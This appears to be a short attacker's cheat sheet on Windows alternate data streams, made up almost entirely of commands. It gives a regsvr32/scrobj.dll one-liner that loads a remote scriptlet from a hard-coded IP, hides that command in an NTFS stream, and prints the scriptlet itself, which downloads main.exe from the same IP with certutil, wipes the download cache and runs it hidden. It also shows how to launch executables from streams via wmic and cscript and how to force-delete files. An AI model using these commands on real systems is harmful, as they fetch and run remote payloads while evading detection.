Alternate Data Stream

regsvr32.exe /s /u /i:http://47.98.135.65/main/main.xml scrobj.dll

cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:http://47.98.135.65/main/main.xml ^scrobj.dll > ...:payload.bat

cmd.exe - < ...:payload.bat

<?xml version="1.0" encoding="UTF-8"?>
<scriptlet>
<registration classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="VBScript">
    <![CDATA[
        CreateObject("WScript.Shell").Run _
            "%ComSpec% /c cd /d %TEMP% && " &_
            "(IF NOT EXIST main.exe certutil.exe -urlcache -split -f http://47.98.135.65/main/main.exe) && " &_
            "certutil.exe -urlcache * delete & " &_
            "main.exe r", 0, false
    ]]>
</script>
</registration>
</scriptlet>

del /f /a /q \\?\%1
rd /s /q \\?\%1

type cmd.exe > ...:cmd.exe
wmic process call create D:\Download\...:cmd.exe

echo winver > ...:run.txt
cmd.exe - < ...:run.txt
or
echo WScript.CreateObject("WScript.Shell").Run "cmd /c for /f ""delims=,"" %i in (...:run.txt) do %i", 0 > ...:run.vbs
cscript ...:run.vbs